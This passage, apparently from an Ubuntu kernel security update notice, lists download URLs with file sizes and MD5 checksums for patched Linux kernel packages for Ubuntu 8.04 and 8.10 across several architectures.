  Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb
  Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   334046 06512921aae848be603af54dc56f72e6
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    62718 e53308b729496be4a0e343535769c74e
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   105746 034c14e0418581e1b8b56913246e96de
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   704830 ef370acc49192e464ef553984e361d88
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   243328 b280fefee27294e988529239616e68fe
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   387992 53b23049b6f79a9609349927adec3443
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   657530 98dd4c49966d886237bed19fddb84057
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb
  Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   266748 d71a805e23acc800f21449d312975e04
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   201688 94056840984e621b385099d261ce2420
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   199752 9d4225f0960410c78279f61aa02471da
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    46836 10f5de3e02406e28d373098a6613860b
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:     8486 80580934d5e5f6909c396732bedf2055
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    83682 bcafd92384fdae95293c310f83443303
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    22356 aa2c6396604a45f318881df2e562f625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb
  Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   270064 879ee6667df636551d565e10ae5162fd
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   175444 37239b1899dd449d5b4985163c46d678
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    40398 81325db98acd64573c100455f0cb5289
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e

Updated packages for Ubuntu 8.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz
  Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc
  Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz
  Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb
  Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb
  Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb
  Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb
  Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb
  Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   186500 940e6b351f4975369720543184596a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   168150 696ed64f02936c7200cc9a468302de40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    68544 cd2e39978716c3448e54d6862877957c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    13614 c860448fa643364e8776a4947cff9714

i386 architecture (x86 compatible Intel/AMD):

